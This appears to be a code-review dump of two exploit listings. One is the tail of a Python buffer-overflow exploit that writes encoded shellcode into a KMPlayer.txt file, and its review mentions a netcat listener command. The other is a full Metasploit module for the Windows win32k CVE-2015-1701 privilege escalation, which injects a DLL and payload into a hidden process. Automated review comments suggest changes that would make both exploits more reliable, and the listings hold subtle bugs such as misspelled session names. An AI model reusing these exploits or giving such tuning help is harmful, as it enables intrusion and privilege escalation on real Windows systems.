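+"\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72"
+"\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e"
+"\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48"
+"\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a"
+"\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b"
+"\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76"
+"\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45"
+"\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33"
+"\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63"
+"\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59"
+"\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59"
+"\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31"
+"\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b"
+"\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49"
+"\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74"
+"\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37"
+"\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34"
+"\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46"
+"\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30"
+"\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77"
+"\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71"
+"\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51"
+"\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37"
+"\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f"
+"\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55"
+"\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69"
+"\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39"
+"\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e"
+"\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44"
+"\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c"
+"\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46"
+"\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71"
+"\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45"
+"\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63"
+"\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b"
+"\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65"
+"\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a"
+"\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a"
+"\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45"
+"\x41\x41")
+buffer += shellcode + "\x71" * (1534 - len(shellcode))
+open("KMPlayer.txt", "wb").write(buffer)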
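Review bot: `buffer += shellcode + "\x71" * (1534 - len(shellcode))` silently produces no padding at all if a regenerated payload ever exceeds 1534 bytes (the multiplier goes negative and yields an empty string), which shifts the whole Venetian chain without any warning; guard it with `assert len(shellcode) <= 1534, "encoded payload too large"`. `open("KMPlayer.txt", "wb").write(buffer)` leaves the handle to the garbage collector; `with open("KMPlayer.txt", "wb") as f: f.write(buffer)` is the idiomatic form. The usage block gives the listener command `nc 172.20.10.14 333` but the bind port lives only in the msfpayload comment, so a one-line note that `LPORT` must match if the shellcode is regenerated would help. The Venetian padding comments assume the filename's ANSI-to-UTF-16 expansion inserts a 0x00 after each byte, which depends on the victim's system code page; that precondition is inferred from the technique rather than stated in the listing and deserves a line in the header.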

137
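--- a/platforms/windows/local/37367.rb
+++ b/platforms/windows/local/37367.rb
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+class Metasploit3 < Msf::Exploit::Local
+Rank = NormalRanking
+include Msf::Post::File
+include Msf::Post::Windows::Priv
+include Msf::Post::Windows::Process
+include Msf::Post::Windows::FileInfo
+include Msf::Post::Windows::ReflectiveDLLInjection
+def initialize(info={})
+super(update_info(info, {
+'Name' => 'Windows ClientCopyImage Win32k Exploit',
+'Description' => %q{
+This module exploits improper object handling in the win32k.sys kernel mode driver.
+This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
+Windows 2008 R2 SP1 x64.
+},
+'License' => MSF_LICENSE,
+'Author' => [
+'Unknown', # vulnerability discovery and exploit in the wild
+'hfirefox', # Code released on github
+'OJ Reeves' # msf module
+],
+'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+'Platform' => 'win',
+'SessionTypes' => [ 'metrepreter' ],
+'DefaultOptions' => {
+'EXITFUNC' => 'thread',
+},
+'Targets' => [
+[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+],
+'Payload' => {
+'Space' => 4096,
+'DisableNops' => true
+},
+'References' => [
+['CVE', '2015-1701'],
+['MSB', 'MS15-051'],
+['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],
+['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],
+['URL', 'https://technet.microsoft.com/library/security/MS15-051']
+],
+'DisclosureDate' => 'May 12 2015',
+'DefaultTarget' => 0
+}))
+end
+def check
+# Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)
+# Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works)
+# Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)
+# Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)
+if sysinfo['OS'] !~ /windows/i
+return Exploit::CheckCode::Unknown
+end
+if sysinfo['Architecture'] =~ /(wow|x)64/i
+arch = ARCH_X86_64
+elsif sysinfo['Architecture'] =~ /x86/i
+arch = ARCH_X86
+end
+file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
+major, minor, build, revision, branch = file_version(file_path)
+vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+return Exploit::CheckCode::Safe if build == 7601
+return Exploit::CheckCode::Detected
+end
+def exploit
+if is_system?
+fail_with(Failure::None, 'Session is already elevated')
+end
+if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
+fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+end
+if sysinfo['Architecture'] =~ /wow64/i
+fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
+fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
+fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+end
+print_status('Launching notepad to host the exploit...')
+notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+begin
+process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+print_good("Process #{process.pid} launched.")
+rescue Rex::Post::Metrepreter::RequestError
+# Reader Sandbox won't allow to create a new process:
+# stdapi_sys_process_execute: Operation failed: Access is denied.
+print_status('Operation failed. Trying to elevate the current process...')
+process = client.sys.process.open
+end
+print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+if target.arch.first == ARCH_X86
+dll_file_name = 'cve-2015-1701.x86.dll'
+else
+dll_file_name = 'cve-2015-1701.x64.dll'
+end
+library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)
+library_path = ::File.expand_path(library_path)
+print_status("Injecting exploit into #{process.pid}...")
+exploit_mem, offset = inject_dll_into_process(process, library_path)
+print_status("Exploit injected. Injecting payload into #{process.pid}...")
+payload_mem = inject_into_process(process, payload.encoded)
+# invoke the exploit, passing in the address of the payload that
+# we want invoked on successful exploitation.
+print_status('Payload injected. Executing exploit...')
+process.thread.create(exploit_mem + offset, payload_mem)
+print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+end
+end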
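Review bot: `check` returns `Exploit::CheckCode::Safe` whenever `build == 7601`, yet the comments directly above list 6.1.7601.17514 (Windows 7 SP1 x86/x64 and 2008 R2 SP1) as the builds that work and the description names them as the tested targets; because `exploit` calls `fail_with(Failure::NotVulnerable, ...)` when `check` is Safe, the module as written refuses to run on its own stated targets. If the comments reflect the intent, the two lines should read `return Exploit::CheckCode::Detected if build == 7601` followed by `Exploit::CheckCode::Safe`, and even then a build number alone cannot tell a patched 7601 from an unpatched one, so `revision` (already returned by `file_version` and then discarded) should be compared against the MS15-051 fixed win32k.sys revision rather than ignored. `arch` is assigned in `check` and never read. `'SessionTypes' => [ 'metrepreter' ]` and `rescue Rex::Post::Metrepreter::RequestError` both spell meterpreter wrongly as listed here: the first means no meterpreter session satisfies the module's session filter, the second raises NameError instead of catching the access-denied case, unless this is a transcription artifact of the listing. `exploit` also invokes `check` twice on one line, re-reading win32k.sys each time; bind it once with `code = check` and compare `code`.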